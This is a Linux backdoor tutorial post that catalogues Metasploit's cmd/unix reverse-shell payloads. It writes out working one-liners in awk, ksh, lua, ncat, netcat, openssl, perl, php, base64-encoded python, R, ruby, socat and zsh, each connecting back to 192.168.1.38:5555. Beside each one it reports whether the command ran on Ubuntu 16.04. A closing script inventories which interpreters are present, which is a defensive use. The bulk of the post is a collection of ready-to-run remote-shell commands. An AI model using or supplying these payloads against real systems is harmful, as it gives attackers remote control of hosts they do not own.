Running through the msf reverse shells in one go | Linux Backdoor Series
msf ships many payloads; here we look at the payloads that can be used for reverse shells on unix.
Switch to the msf directory:
./msfvenom -l payloads | grep 'cmd/unix/reverse'
Let's go through them one by one.
- cmd/unix/reverse_awk
awk 'BEGIN{s="/inet/tcp/0/192.168.1.38/5555";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
On Ubuntu 16.04 this awk command fails with the default awk: the /inet/tcp socket syntax is a gawk feature, and everyone online seems to be doing this on CentOS. gawk is not the default awk on Ubuntu 16.04 and has to be installed, which goes against what I had assumed.
- cmd/unix/reverse_bash
Nothing much to test here; the earlier articles covered far more than this.
- cmd/unix/reverse_bash_telnet_ssl
mkfifo hoDXPErDo && telnet -z verify=0 192.168.1.38 5555 0<hoDXPErDo | $(which $0) 1>hoDXPErDo & sleep 10 && rm hoDXPErDo &
As you can see, the telnet shipped with Ubuntu 16.04 has no -z option, so the command fails; I don't know whether it works on CentOS.
- cmd/unix/reverse_bash_udp
Not much to say about this one; just remember to run it with sh.
- cmd/unix/reverse_jjs
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs
As you can see, a reverse shell via jjs needs a Java environment, and Ubuntu 16.04 has no Java installed.
- cmd/unix/reverse_ksh
ksh -c 'ksh >/dev/tcp/192.168.1.38/5555 2>&1 <&1'
ksh is not shipped with Ubuntu 16.04.
- cmd/unix/reverse_lua
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.38',5555);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
No need to check this one: Ubuntu 16.04 certainly does not ship Lua by default; don't ask me how I'm so sure.
- cmd/unix/reverse_ncat_ssl
ncat -e /bin/sh --ssl 192.168.1.38 5555
ncat is a component of Nmap and is not present on Ubuntu 16.04 by default.
- cmd/unix/reverse_netcat
mkfifo /tmp/gbiwa; nc 192.168.1.38 5555 0</tmp/gbiwa | /bin/sh >/tmp/gbiwa 2>&1; rm /tmp/gbiwa
See the earlier article on nc reverse shells.
- cmd/unix/reverse_netcat_gaping
- cmd/unix/reverse_nodejs
node -e 'eval("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");'
Judging by its shape, this seems to use nodejs to eval a blob of code (shellcode-like).
Ubuntu 16.04 does not ship nodejs.
- cmd/unix/reverse_openssl
sh -c '(sleep 3797|openssl s_client -quiet -connect 192.168.1.38:5555|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 >/dev/null 2>&1 &)'
This payload differs a little from the openssl one we used before, but it is broadly the same idea.
Good, another openssl variant of the shell found.
- cmd/unix/reverse_perl
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.38:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
As you can see, execution fails; the cause is a problem with the IO module. If you want a perl reverse shell, see the earlier article.
- cmd/unix/reverse_perl_ssl
perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"192.168.1.38:5555",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
- cmd/unix/reverse_php_ssl
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.1.38:5555",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
Same problem as above.
- cmd/unix/reverse_python
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsICAgICAgIHN1YnByb2Nlc3MgICAgLCAgICAgICBvcyAgICAgICAgOyAgIGhvc3Q9IjE5Mi4xNjguMS4zOCIgICAgICAgIDsgICBwb3J0PTU1NTUgICAgICAgIDsgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgcy5jb25uZWN0KChob3N0ICAgICwgICAgICAgcG9ydCkpICAgICAgICA7ICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAgMCkgICAgICAgIDsgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgICAgICAxKSAgICAgICAgOyAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgICAgIDIpICAgICAgICA7ICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
Ubuntu 16.04 defaults to python3, whereas this payload targets python2; see the earlier python3 chapter for details.
- cmd/unix/reverse_python_ssl
python -c "exec('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'.decode('base64'))" >/dev/null 2>&1 &
Same problem as above.
- cmd/unix/reverse_r
R -e "s<-socketConnection(host='192.168.1.38',port=5555,blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines(pipe(readLines(s, 1))),s)}"
R is not installed by default either.
- cmd/unix/reverse_ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.38","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby is not installed on Ubuntu 16.04 either.
- cmd/unix/reverse_ruby_ssl
ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("192.168.1.38","5555")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end'
Same reason as above.
- cmd/unix/reverse_socat_udp
socat udp-connect:192.168.1.38:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
socat is not installed by default on Ubuntu 16.04.
- cmd/unix/reverse_ssl_double_telnet
sh -c '(sleep 4119|telnet -z 192.168.1.38 5555|while : ; do sh && break; done 2>&1|telnet -z 192.168.1.38 5555 >/dev/null 2>&1 &)'
telnet has no -z option; next.
- cmd/unix/reverse_stub
Creates an interactive shell through an inbound connection (stub only, no payload)
The line above is this payload's description. It does not generate a reverse-shell command, and I searched both Chinese and foreign articles without finding an explanation.
After testing, it appears to be simply an nc-style listener: it can be set in exploit/multi/handler to receive shells coming back from bash, python3 and so on, while listening for openssl and meterpreter fails.
- cmd/unix/reverse_zsh
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.38 5555 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
zsh is not installed by default either, although many distributions do ship zsh by default.
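The article's per-payload checks boil down to one question per host: is the interpreter the payload depends on even there? The script below is an added defender-side inventory (not code from the original post or from Metasploit) that answers it for every cmd/unix/reverse_* payload listed above; the payload-to-tool mapping is my own reading of the one-liners, and the awk and python caveats reproduce the two failures the article hit on Ubuntu 16.04.

```shell
#!/bin/sh
# Audit which cmd/unix/reverse_* payloads would find their interpreter on
# this host. Mapping derived from the one-liners on this page; /dev/tcp and
# /dev/udp are bash features, so the reverse_bash* entries map to bash.
# A "present" tool is a candidate for removal on hosts that do not need it.
PAYLOAD_TOOLS="reverse_awk:gawk reverse_bash:bash reverse_bash_udp:bash \
reverse_bash_telnet_ssl:telnet reverse_ssl_double_telnet:telnet reverse_jjs:jjs \
reverse_ksh:ksh reverse_lua:lua reverse_ncat_ssl:ncat reverse_netcat:nc \
reverse_netcat_gaping:nc reverse_nodejs:node reverse_openssl:openssl \
reverse_perl:perl reverse_perl_ssl:perl reverse_php_ssl:php reverse_python:python \
reverse_python_ssl:python reverse_r:R reverse_ruby:ruby reverse_ruby_ssl:ruby \
reverse_socat_udp:socat reverse_zsh:zsh"

# 0 if the named executable is on PATH, 1 otherwise.
tool_present() { command -v "$1" >/dev/null 2>&1; }

# Print the tool that cmd/unix/$1 depends on; fail for unknown payloads.
payload_tool() {
  for pair in $PAYLOAD_TOOLS; do
    [ "${pair%%:*}" = "$1" ] && { echo "${pair#*:}"; return 0; }
  done
  return 1
}

# 0 if the payload's interpreter is present on this host.
payload_ready() {
  tool=$(payload_tool "$1") || return 1
  tool_present "$tool"
}

# Caveats the article's tests surfaced beyond mere presence of the binary.
payload_caveat() {
  case "$1" in
    reverse_awk)   # /inet/tcp is a gawk extension; mawk (Ubuntu's default awk) lacks it
      awk --version 2>/dev/null | grep -q 'GNU Awk' || echo "awk is not gawk" ;;
    reverse_python*)   # the payload relies on str.decode('base64'), python2 only
      python -c 'import sys; sys.exit(sys.version_info[0] != 2)' 2>/dev/null \
        || echo "python is not python2" ;;
  esac
}

# One line per payload: name, whether its tool is present, and any caveat.
audit_payloads() {
  for pair in $PAYLOAD_TOOLS; do
    p=${pair%%:*}
    if payload_ready "$p"; then s=present; else s=absent; fi
    printf '%-28s %-8s %s\n' "cmd/unix/$p" "$s" "$(payload_caveat "$p")"
  done
}

audit_payloads
```

Run it on a freshly installed host to get the same kind of table the article builds by hand, then diff it against a hardened baseline.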